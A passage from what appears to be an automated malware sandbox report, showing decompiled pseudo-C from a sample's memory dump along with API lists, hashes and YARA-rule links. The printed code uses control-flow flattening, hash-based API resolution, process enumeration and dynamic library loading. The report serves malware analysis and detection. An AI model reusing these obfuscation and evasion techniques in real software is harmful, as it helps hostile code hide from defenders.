											r9d = 0x61;
											E00A1FAD7(1, _t278, _t307, _t327);
											 *_t307(); // executed
											_v120 = _t307;
											r8d = 0xfd3d1fba;
											r9d = 0x5f;
											E00A1FAD7(1, _t278, _t307, _t327);
											_t327 = _v120;
											 *_t307(); // executed
											_t155 =  ==  ? 0x4459eabe : 0x90bf802d;
											_t207 = 1;
										}
									}
								}
								continue;
							}
							if(_t155 > 0xf699f5c4) {
								if(_t155 == 0xf699f5c5) {
									goto L61;
								}
								if(_t155 != 0x42fedaa) {
									continue;
								}
								_t307 = _v264;
								_v268 =  *(_t307 + 1) + 0x000000bf & 0x000000ff;
								_t167 = 0x156d8658;
								goto L88;
							}
							if(_t155 == 0xd01fc256) {
								_v248 = r14b;
								_v244 = 0x47e317b0;
								_v240 = 0x45c33cb0;
								_v236 = 0x54c811fd;
								_v232 = 0x31b074d3;
								if(_v248 != r14b) {
									L75:
									_t327 = _v224;
									r8d = 0xc;
									E00A1CA65(_t327, _t346, _t351);
									_t155 =  ==  ? 0xa0db398f : 0x74143c86;
									continue;
								}
								do {
									 *(_t350 + 0x44 + _t307 * 4) = ( *(_t350 + 0x44 + _t307 * 4) & 0xb5f129fc |  !( *(_t350 + 0x44 + _t307 * 4)) & 0x4a0ed603) ^ 0x7bbea2d0;
									_t307 = _t307 + 1;
								} while (_t307 != 4);
								goto L75;
							} else {
								if(_t155 == 0xedb8c621) {
									_t155 = 0x4a7d6900;
									r15d = _v212;
								}
								continue;
							}
						}
						if(_t155 <= 0x90bf802c) {
							if(_t155 == 0x8161912a) {
								r15d = 0;
								r8d = 0xce1f1c4e;
								r9d = 0xc5;
								E00A1FAD7(1, _t278, _t307, _t327);
								 *_t307();
								_t155 = 0x4a7d6900;
								continue;
							}
							if(_t155 == 0x82cc269e) {
								_v144 = r14b;
								_v140 = 0x23a07c9f;
								_v136 = 0x33b759aa;
								_v132 = 0x35b96ff0;
								_v128 = 0x50c10ade;
								if(_v144 != r14b) {
									L81:
									_t327 = _v224;
									r8d = 0xc;
									E00A1CA65(_t327, _v80, _t351);
									_t307 = _v200;
									_t155 =  ==  ? 0xaac379a3 : 0xd01fc256;
									continue;
								}
								do {
									 *(_t350 + 0xac + _t307 * 4) = ( *(_t350 + 0xac + _t307 * 4) & 0x5681c0fd |  !( *(_t350 + 0xac + _t307 * 4)) & 0xa97e3f02) ^ 0xf9bf35dc;
									_t307 = _t307 + 1;
								} while (_t307 != 4);
								goto L81;
							}
							if(_t155 == 0x84ce7a97) {
								_t155 = 0x79c90ec8;
								r12d = 8;
							}
							continue;
						}
						if(_t155 > 0xa0db398e) {
							if(_t155 == 0xa0db398f) {
								_t155 = 0x79c90ec8;
								r12d = 4;
							} else {
								if(_t155 == 0xaac379a3) {
									_t155 = 0x79c90ec8;
									r12d = 2;
								}
							}
							continue;
						}
						if(_t155 == 0x90bf802d) {
							_v108 = _t207;
							_v200 =  &_v160;
							_t315 = _v200;
							_v160 = r14b;
							_v156 = 0x333f36d7;
							_v152 = 0x383b6ee2;
							_v148 = 0x405e40f3;
							if(_v160 != r14b) {
								L67:
								_v224 = _v208 + 0x2c;
								_t327 = _v224;
								r8d = 9;
								E00A1CA65(_t327, _t354, _t351);
								_v192 =  &_v176;
								_v184 =  &_v144;
								_t307 = _v184;
								_t155 =  ==  ? 0x17687833 : 0x26d898f7;
								continue;
							}
							do {
								 *(_t350 + 0x98 + _t315 * 4) = ( *(_t350 + 0x98 + _t315 * 4) & 0x1233963d |  !( *(_t350 + 0x98 + _t315 * 4)) & 0xedcc69c2) ^ 0xad922954;
								_t327 = _t327 + 1;
								_t315 = _t315 + 1;
							} while (_t315 != 4);
							goto L67;
						}
						if(_t155 != 0x9e0aa110) {
							continue;
						} else {
							_t307 = _v264;
							_t179 = 0x4a7d6900;
							_t215 = 0x6b450fdf;
							goto L63;
						}
					}
				}
			}
























































                                                                                                                                                        0x00a14554
                                                                                                                                                        0x00a14560
                                                                                                                                                        0x00a14567
                                                                                                                                                        0x00a1456f
                                                                                                                                                        0x00a14574
                                                                                                                                                        0x00a1457e
                                                                                                                                                        0x00a14581
                                                                                                                                                        0x00a14589
                                                                                                                                                        0x00a14595
                                                                                                                                                        0x00a145a2
                                                                                                                                                        0x00a145b1
                                                                                                                                                        0x00a145b7
                                                                                                                                                        0x00a145bd
                                                                                                                                                        0x00a145c2
                                                                                                                                                        0x00a145c8
                                                                                                                                                        0x00a145ce
                                                                                                                                                        0x00a145d0
                                                                                                                                                        0x00a145d8
                                                                                                                                                        0x00a145e3
                                                                                                                                                        0x00a145f1
                                                                                                                                                        0x00a14604
                                                                                                                                                        0x00a1460c
                                                                                                                                                        0x00a14614
                                                                                                                                                        0x00a14617
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1461c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1461c
                                                                                                                                                        0x00a1461c
                                                                                                                                                        0x00a1462c
                                                                                                                                                        0x00a14726
                                                                                                                                                        0x00a14812
                                                                                                                                                        0x00a14df0
                                                                                                                                                        0x00a14e4e
                                                                                                                                                        0x00a14e53
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14e53
                                                                                                                                                        0x00a1481d
                                                                                                                                                        0x00a14ac5
                                                                                                                                                        0x00a14ad2
                                                                                                                                                        0x00a14ad7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14ad7
                                                                                                                                                        0x00a14828
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1482e
                                                                                                                                                        0x00a14833
                                                                                                                                                        0x00a1483b
                                                                                                                                                        0x00a14843
                                                                                                                                                        0x00a14850
                                                                                                                                                        0x00a1487f
                                                                                                                                                        0x00a1487f
                                                                                                                                                        0x00a14884
                                                                                                                                                        0x00a1488d
                                                                                                                                                        0x00a1489e
                                                                                                                                                        0x00a148a1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a148a1
                                                                                                                                                        0x00a14859
                                                                                                                                                        0x00a1486f
                                                                                                                                                        0x00a14873
                                                                                                                                                        0x00a14876
                                                                                                                                                        0x00a14879
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14859
                                                                                                                                                        0x00a14731
                                                                                                                                                        0x00a149d1
                                                                                                                                                        0x00a14e49
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14e49
                                                                                                                                                        0x00a149dc
                                                                                                                                                        0x00a149e2
                                                                                                                                                        0x00a149f4
                                                                                                                                                        0x00a149fa
                                                                                                                                                        0x00a14a00
                                                                                                                                                        0x00a14a08
                                                                                                                                                        0x00a14a12
                                                                                                                                                        0x00a14a1c
                                                                                                                                                        0x00a14a27
                                                                                                                                                        0x00a14a2a
                                                                                                                                                        0x00a14a2f
                                                                                                                                                        0x00a14a47
                                                                                                                                                        0x00a14a4d
                                                                                                                                                        0x00a14a53
                                                                                                                                                        0x00a14a58
                                                                                                                                                        0x00a14a5e
                                                                                                                                                        0x00a14a61
                                                                                                                                                        0x00a14a64
                                                                                                                                                        0x00a14a66
                                                                                                                                                        0x00a14a6d
                                                                                                                                                        0x00a14a6d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a149dc
                                                                                                                                                        0x00a1473c
                                                                                                                                                        0x00a14be2
                                                                                                                                                        0x00a14bea
                                                                                                                                                        0x00a14bf5
                                                                                                                                                        0x00a14c00
                                                                                                                                                        0x00a14c13
                                                                                                                                                        0x00a14c4e
                                                                                                                                                        0x00a14c4e
                                                                                                                                                        0x00a14c53
                                                                                                                                                        0x00a14c61
                                                                                                                                                        0x00a14c72
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14c72
                                                                                                                                                        0x00a14c1c
                                                                                                                                                        0x00a14c3b
                                                                                                                                                        0x00a14c42
                                                                                                                                                        0x00a14c45
                                                                                                                                                        0x00a14c48
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14742
                                                                                                                                                        0x00a14747
                                                                                                                                                        0x00a1475e
                                                                                                                                                        0x00a14761
                                                                                                                                                        0x00a14761
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14747
                                                                                                                                                        0x00a1473c
                                                                                                                                                        0x00a14637
                                                                                                                                                        0x00a147b0
                                                                                                                                                        0x00a14aaf
                                                                                                                                                        0x00a14e6f
                                                                                                                                                        0x00a14e75
                                                                                                                                                        0x00a14e7b
                                                                                                                                                        0x00a14e80
                                                                                                                                                        0x00a14e86
                                                                                                                                                        0x00a14e95
                                                                                                                                                        0x00a14e98
                                                                                                                                                        0x00a14e9c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14e9c
                                                                                                                                                        0x00a14aba
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14ebc
                                                                                                                                                        0x00a147b6
                                                                                                                                                        0x00a147bb
                                                                                                                                                        0x00a14d05
                                                                                                                                                        0x00a14d0b
                                                                                                                                                        0x00a147c1
                                                                                                                                                        0x00a147c6
                                                                                                                                                        0x00a147cc
                                                                                                                                                        0x00a147d1
                                                                                                                                                        0x00a147d1
                                                                                                                                                        0x00a147c6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a147bb
                                                                                                                                                        0x00a147b0
                                                                                                                                                        0x00a14642
                                                                                                                                                        0x00a14973
                                                                                                                                                        0x00a14e2b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14e2b
                                                                                                                                                        0x00a1497e
                                                                                                                                                        0x00a14984
                                                                                                                                                        0x00a1499a
                                                                                                                                                        0x00a1499d
                                                                                                                                                        0x00a1499d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1497e
                                                                                                                                                        0x00a1464d
                                                                                                                                                        0x00a14ae1
                                                                                                                                                        0x00a14ae9
                                                                                                                                                        0x00a14aee
                                                                                                                                                        0x00a14af3
                                                                                                                                                        0x00a14af3
                                                                                                                                                        0x00a14af6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14af6
                                                                                                                                                        0x00a14658
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1465a
                                                                                                                                                        0x00a1465f
                                                                                                                                                        0x00a14667
                                                                                                                                                        0x00a1466f
                                                                                                                                                        0x00a1467c
                                                                                                                                                        0x00a146ab
                                                                                                                                                        0x00a146ab
                                                                                                                                                        0x00a146b0
                                                                                                                                                        0x00a146b9
                                                                                                                                                        0x00a146ca
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1467e
                                                                                                                                                        0x00a14685
                                                                                                                                                        0x00a1469b
                                                                                                                                                        0x00a1469f
                                                                                                                                                        0x00a146a2
                                                                                                                                                        0x00a146a5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14685
                                                                                                                                                        0x00a1467c
                                                                                                                                                        0x00a146d7
                                                                                                                                                        0x00a14773
                                                                                                                                                        0x00a148b3
                                                                                                                                                        0x00a14e0a
                                                                                                                                                        0x00a148b9
                                                                                                                                                        0x00a148be
                                                                                                                                                        0x00a14e12
                                                                                                                                                        0x00a14e1b
                                                                                                                                                        0x00a148c4
                                                                                                                                                        0x00a148c9
                                                                                                                                                        0x00a148d4
                                                                                                                                                        0x00a148d9
                                                                                                                                                        0x00a148e9
                                                                                                                                                        0x00a148ee
                                                                                                                                                        0x00a148f3
                                                                                                                                                        0x00a148f9
                                                                                                                                                        0x00a14905
                                                                                                                                                        0x00a1490b
                                                                                                                                                        0x00a14911
                                                                                                                                                        0x00a1491d
                                                                                                                                                        0x00a1491f
                                                                                                                                                        0x00a1493b
                                                                                                                                                        0x00a14941
                                                                                                                                                        0x00a14947
                                                                                                                                                        0x00a1494c
                                                                                                                                                        0x00a14952
                                                                                                                                                        0x00a14961
                                                                                                                                                        0x00a14964
                                                                                                                                                        0x00a14964
                                                                                                                                                        0x00a148c9
                                                                                                                                                        0x00a148be
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a148b3
                                                                                                                                                        0x00a1477e
                                                                                                                                                        0x00a14a7b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14a82
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14a88
                                                                                                                                                        0x00a14a95
                                                                                                                                                        0x00a14aa0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14aa0
                                                                                                                                                        0x00a14789
                                                                                                                                                        0x00a14c7a
                                                                                                                                                        0x00a14c7f
                                                                                                                                                        0x00a14c87
                                                                                                                                                        0x00a14c8f
                                                                                                                                                        0x00a14c97
                                                                                                                                                        0x00a14ca4
                                                                                                                                                        0x00a14cd1
                                                                                                                                                        0x00a14cd1
                                                                                                                                                        0x00a14cd6
                                                                                                                                                        0x00a14cdf
                                                                                                                                                        0x00a14cf0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14cf0
                                                                                                                                                        0x00a14ca8
                                                                                                                                                        0x00a14cc4
                                                                                                                                                        0x00a14cc8
                                                                                                                                                        0x00a14ccb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1478f
                                                                                                                                                        0x00a14794
                                                                                                                                                        0x00a1479a
                                                                                                                                                        0x00a147a3
                                                                                                                                                        0x00a147a3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14794
                                                                                                                                                        0x00a14789
                                                                                                                                                        0x00a146e2
                                                                                                                                                        0x00a147e1
                                                                                                                                                        0x00a14d15
                                                                                                                                                        0x00a14d1f
                                                                                                                                                        0x00a14d25
                                                                                                                                                        0x00a14d2b
                                                                                                                                                        0x00a14d30
                                                                                                                                                        0x00a14d32
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14d32
                                                                                                                                                        0x00a147ec
                                                                                                                                                        0x00a14d3c
                                                                                                                                                        0x00a14d44
                                                                                                                                                        0x00a14d4f
                                                                                                                                                        0x00a14d5a
                                                                                                                                                        0x00a14d65
                                                                                                                                                        0x00a14d78
                                                                                                                                                        0x00a14dab
                                                                                                                                                        0x00a14dab
                                                                                                                                                        0x00a14db0
                                                                                                                                                        0x00a14dbe
                                                                                                                                                        0x00a14dd2
                                                                                                                                                        0x00a14de1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14de1
                                                                                                                                                        0x00a14d7c
                                                                                                                                                        0x00a14d9b
                                                                                                                                                        0x00a14da2
                                                                                                                                                        0x00a14da5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14d7c
                                                                                                                                                        0x00a147f7
                                                                                                                                                        0x00a147fd
                                                                                                                                                        0x00a14802
                                                                                                                                                        0x00a14802
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a147f7
                                                                                                                                                        0x00a146ed
                                                                                                                                                        0x00a149ab
                                                                                                                                                        0x00a14e32
                                                                                                                                                        0x00a14e37
                                                                                                                                                        0x00a149b1
                                                                                                                                                        0x00a149b6
                                                                                                                                                        0x00a149bc
                                                                                                                                                        0x00a149c1
                                                                                                                                                        0x00a149c1
                                                                                                                                                        0x00a149b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a149ab
                                                                                                                                                        0x00a146f8
                                                                                                                                                        0x00a14afe
                                                                                                                                                        0x00a14b0d
                                                                                                                                                        0x00a14b12
                                                                                                                                                        0x00a14b17
                                                                                                                                                        0x00a14b1f
                                                                                                                                                        0x00a14b2a
                                                                                                                                                        0x00a14b35
                                                                                                                                                        0x00a14b48
                                                                                                                                                        0x00a14b83
                                                                                                                                                        0x00a14b8c
                                                                                                                                                        0x00a14b91
                                                                                                                                                        0x00a14b96
                                                                                                                                                        0x00a14b9f
                                                                                                                                                        0x00a14bae
                                                                                                                                                        0x00a14bc0
                                                                                                                                                        0x00a14bc8
                                                                                                                                                        0x00a14bda
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14bda
                                                                                                                                                        0x00a14b51
                                                                                                                                                        0x00a14b70
                                                                                                                                                        0x00a14b77
                                                                                                                                                        0x00a14b7a
                                                                                                                                                        0x00a14b7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14b51
                                                                                                                                                        0x00a14703
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14709
                                                                                                                                                        0x00a14709
                                                                                                                                                        0x00a14712
                                                                                                                                                        0x00a14717
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a14717
                                                                                                                                                        0x00a14703
                                                                                                                                                        0x00a1461c

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A1CDB9: RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00A20A77), ref: 00A1CE20
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00A1491D
                                                                                                                                                        • Process32First.KERNEL32 ref: 00A14952
                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE ref: 00A14A08
                                                                                                                                                        • Process32Next.KERNEL32 ref: 00A14E86
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000019.00000002.634304009.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                        • Associated: 00000019.00000002.634295050.0000000000A10000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634331329.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634341347.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$AllocateChangeCloseCreateFindFirstHeapNextNotificationSnapshotToolhelp32
                                                                                                                                                        • String ID: n;8
                                                                                                                                                        • API String ID: 1393362854-2108076282
                                                                                                                                                        • Opcode ID: fcc6a3db49a038e27a310dbb4d983f34b63867fa87f5d81bbfd4e42c1535ee92
                                                                                                                                                        • Instruction ID: cbf18337a0daf7053432c69da6dd88997bd609c3a6c9881e171e17353e739596
                                                                                                                                                        • Opcode Fuzzy Hash: fcc6a3db49a038e27a310dbb4d983f34b63867fa87f5d81bbfd4e42c1535ee92
                                                                                                                                                        • Instruction Fuzzy Hash: DE12FA723187C48ADB748B5DA4407AFB761E7D9B94F24442ADB8AD7B58CA3DC8C18F01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00A1EFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E00A1EFD3(intOrPtr __edx, long long __rax, long long __rcx, void* __rdx, void* __r8, void* __r11) {
				long long _v72;
				long long _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				long long _v104;
				long long _v112;
				intOrPtr _t24;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				long long _t56;
				long long _t61;
				void* _t63;
				long long _t64;
				long long _t66;
				void* _t68;
				void* _t69;
				long long _t70;

				_t69 = __r11;
				_t68 = __r8;
				_t63 = __rdx;
				_t62 = __rcx;
				_t56 = __rax;
				_t66 = __rcx;
				_v84 = r8d;
				_t34 =  ==  ? 0x64798daa : 0x23a3853d;
				_v88 =  ==  ? 0x64798daa : 0x23a3853d;
				r13d = 0x8f34f1b0;
				r13d =  ==  ? 0x84c104ed : r13d;
				_v92 = __edx;
				r14d = 0x71c9cf43;
				r14d =  ==  ? 0xf3019199 : r14d;
				_t24 = 0xf82b818e;
				while(1) {
					L1:
					_t35 = _t24;
					if(_t24 <= 0x18bc41aa) {
						break;
					}
					if(_t35 > 0x38ab292f) {
						if(_t35 > 0x65e67dfa) {
							if(_t35 == 0x71c9cf43) {
								r12d = 0;
								_t64 = _t66;
								_t24 = r13d;
								continue;
							}
							_t24 = _t35;
							if(_t35 != 0x65e67dfb) {
								continue;
							}
							return _t24;
						}
						if(_t35 == 0x38ab2930) {
							_t56 = _v112;
							_t24 = 0x98ea932f;
							if( *_t56 != 0) {
								_t24 = 0x33675366;
							}
							L40:
							_t61 = _v104;
							continue;
						}
						_t24 = _t35;
						if(_t35 == 0x64798daa) {
							_t24 = 0x65e67dfb;
						}
						continue;
					}
					if(_t35 > 0x2f447a17) {
						if(_t35 == 0x2f447a18) {
							_t24 = 0xfaff49ef;
							continue;
						}
						_t24 = _t35;
						if(_t35 != 0x33675366) {
							continue;
						}
						r8d = 0x18d1ea71;
						r9d = 0x2b;
						E00A1FAD7(1, 0, _t56, _t62);
						_t62 = _v112;
						 *_t56();
						_t61 = _t56;
						_t24 = 0x18bc41ab;
						if(_t61 == 0) {
							continue;
						}
						L32:
						_t24 = 0x98ea932f;
						continue;
					}
					if(_t35 == 0x18bc41ab) {
						r8d = 0x84161500;
						r9d = 2;
						E00A1FAD7(1, 0, _t56, _t62);
						_t62 = _v112; // executed
						LoadLibraryA(??); // executed
						goto L32;
					} else {
						_t24 = _t35;
						if(_t35 == 0x23a3853d) {
							_t62 = _v72;
							E00A1F29F(_v84, _t44, _t46, _v72, _t63, _t68, _t69);
							_v80 = _t56;
							_t24 = 0xe79882b1;
							if(_v80 != 0) {
								_t24 = 0x2f447a18;
							}
						}
						continue;
					}
				}
				if(_t35 <= 0xe79882b0) {
					if(_t35 == 0x84c104ed) {
						E00A1F5B9(_v92);
						_t64 = _t56;
						_t24 = 0x8f34f1b0;
						r12d = 0;
						goto L1;
					}
					if(_t35 == 0x8f34f1b0) {
						_v104 = _t70;
						_v112 = _t64;
						_t62 = _v104;
						_t43 = 0x38ab2930;
						if(_v112 == _t61) {
							_t43 = 0x98ea932f;
						}
						_t24 =  ==  ? _t43 : 0x98ea932f;
						goto L40;
					}
					_t24 = _t35;
					if(_t35 == 0x98ea932f) {
						_v72 = _t61;
						_t24 = _v88;
					}
				} else {
					if(_t35 > 0xf82b818d) {
						_t24 = r14d;
						if(_t35 != 0xf82b818e) {
							_t24 = _t35;
							if(_t35 == 0xfaff49ef) {
								_t24 = 0x65e67dfb;
							}
						}
					} else {
						if(_t35 == 0xe79882b1) {
							_t24 = 0xfaff49ef;
						} else {
							_t24 = _t35;
							if(_t35 == 0xf3019199) {
								_t24 = 0x8f34f1b0;
								_t70 =  *0xa25030;
								_t64 = _t66;
							}
						}
					}
				}
			}























                                                                                                                                                        0x00a1efd3
                                                                                                                                                        0x00a1efd3
                                                                                                                                                        0x00a1efd3
                                                                                                                                                        0x00a1efd3
                                                                                                                                                        0x00a1efd3
                                                                                                                                                        0x00a1efe3
                                                                                                                                                        0x00a1efe6
                                                                                                                                                        0x00a1eff8
                                                                                                                                                        0x00a1effb
                                                                                                                                                        0x00a1f007
                                                                                                                                                        0x00a1f00d
                                                                                                                                                        0x00a1f011
                                                                                                                                                        0x00a1f01d
                                                                                                                                                        0x00a1f023
                                                                                                                                                        0x00a1f027
                                                                                                                                                        0x00a1f02c
                                                                                                                                                        0x00a1f02c
                                                                                                                                                        0x00a1f02c
                                                                                                                                                        0x00a1f033
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f03b
                                                                                                                                                        0x00a1f0d2
                                                                                                                                                        0x00a1f1b4
                                                                                                                                                        0x00a1f27d
                                                                                                                                                        0x00a1f280
                                                                                                                                                        0x00a1f283
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f283
                                                                                                                                                        0x00a1f1ba
                                                                                                                                                        0x00a1f1c2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f29e
                                                                                                                                                        0x00a1f29e
                                                                                                                                                        0x00a1f0de
                                                                                                                                                        0x00a1f208
                                                                                                                                                        0x00a1f210
                                                                                                                                                        0x00a1f215
                                                                                                                                                        0x00a1f217
                                                                                                                                                        0x00a1f217
                                                                                                                                                        0x00a1f264
                                                                                                                                                        0x00a1f264
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f264
                                                                                                                                                        0x00a1f0e4
                                                                                                                                                        0x00a1f0ec
                                                                                                                                                        0x00a1f0f7
                                                                                                                                                        0x00a1f0f7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f0ec
                                                                                                                                                        0x00a1f047
                                                                                                                                                        0x00a1f13b
                                                                                                                                                        0x00a1f26e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f273
                                                                                                                                                        0x00a1f141
                                                                                                                                                        0x00a1f149
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f15b
                                                                                                                                                        0x00a1f161
                                                                                                                                                        0x00a1f167
                                                                                                                                                        0x00a1f16c
                                                                                                                                                        0x00a1f16f
                                                                                                                                                        0x00a1f171
                                                                                                                                                        0x00a1f174
                                                                                                                                                        0x00a1f17c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f1f2
                                                                                                                                                        0x00a1f1f2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f1f2
                                                                                                                                                        0x00a1f053
                                                                                                                                                        0x00a1f1d9
                                                                                                                                                        0x00a1f1df
                                                                                                                                                        0x00a1f1e5
                                                                                                                                                        0x00a1f1ea
                                                                                                                                                        0x00a1f1ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f059
                                                                                                                                                        0x00a1f059
                                                                                                                                                        0x00a1f061
                                                                                                                                                        0x00a1f063
                                                                                                                                                        0x00a1f06c
                                                                                                                                                        0x00a1f071
                                                                                                                                                        0x00a1f07c
                                                                                                                                                        0x00a1f081
                                                                                                                                                        0x00a1f083
                                                                                                                                                        0x00a1f083
                                                                                                                                                        0x00a1f081
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f061
                                                                                                                                                        0x00a1f053
                                                                                                                                                        0x00a1f090
                                                                                                                                                        0x00a1f107
                                                                                                                                                        0x00a1f222
                                                                                                                                                        0x00a1f227
                                                                                                                                                        0x00a1f22a
                                                                                                                                                        0x00a1f22f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f22f
                                                                                                                                                        0x00a1f113
                                                                                                                                                        0x00a1f237
                                                                                                                                                        0x00a1f23c
                                                                                                                                                        0x00a1f241
                                                                                                                                                        0x00a1f246
                                                                                                                                                        0x00a1f257
                                                                                                                                                        0x00a1f259
                                                                                                                                                        0x00a1f259
                                                                                                                                                        0x00a1f261
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1f261
                                                                                                                                                        0x00a1f119
                                                                                                                                                        0x00a1f121
                                                                                                                                                        0x00a1f127
                                                                                                                                                        0x00a1f12c
                                                                                                                                                        0x00a1f12c
                                                                                                                                                        0x00a1f092
                                                                                                                                                        0x00a1f098
                                                                                                                                                        0x00a1f184
                                                                                                                                                        0x00a1f18d
                                                                                                                                                        0x00a1f193
                                                                                                                                                        0x00a1f19b
                                                                                                                                                        0x00a1f1a1
                                                                                                                                                        0x00a1f1a6
                                                                                                                                                        0x00a1f19b
                                                                                                                                                        0x00a1f09e
                                                                                                                                                        0x00a1f0a4
                                                                                                                                                        0x00a1f1fc
                                                                                                                                                        0x00a1f0aa
                                                                                                                                                        0x00a1f0aa
                                                                                                                                                        0x00a1f0b2
                                                                                                                                                        0x00a1f0b8
                                                                                                                                                        0x00a1f0bd
                                                                                                                                                        0x00a1f0c4
                                                                                                                                                        0x00a1f0c4
                                                                                                                                                        0x00a1f0b2
                                                                                                                                                        0x00a1f0a4
                                                                                                                                                        0x00a1f098

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,EA203201,079849AE,E8F2AD3B,00000095,?,?,00000001,00A1FC0A,?,?,079849AE,E8F2AD3B), ref: 00A1F1ED
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000019.00000002.634304009.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                        • Associated: 00000019.00000002.634295050.0000000000A10000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634331329.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634341347.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID: fSg3$fSg3
                                                                                                                                                        • API String ID: 1029625771-263991881
                                                                                                                                                        • Opcode ID: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction ID: 720a3af678828b332359f7f641898eda3247b75f80851a6ec4f0a17f59b3aa22
                                                                                                                                                        • Opcode Fuzzy Hash: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction Fuzzy Hash: 605129313149D0CEDB284679B8A06B961A4BB587E4F68403AFE4BCBB15E63DCCC18710
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00A1CDB9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E00A1CDB9(void* __ecx, long long __rax) {
				long long _v48;
				void* _t5;
				void* _t21;
				void* _t23;
				long long _t29;
				void* _t36;
				void* _t40;

				_t29 = __rax;
				_t21 = __ecx;
				_t23 =  ==  ? 0x79212036 : 0xea203201;
				_t5 = 0x534cbae1;
				r14d = 0xe8f2ad3b;
				L1:
				while(1) {
					if(_t5 <= 0x4eab221e) {
						if(_t5 == 0xe8f2ad3b) {
							_t5 = 0x4eab221f;
						} else {
							if(_t5 == 0xea203201) {
								r8d = 0x54cac072;
								r9d = 0x95;
								E00A1FAD7(1, _t21, _t29, _t33);
								 *_t29();
								_v48 = _t29;
								_t5 =  ==  ? r14d : 0x2f3e82e;
							} else {
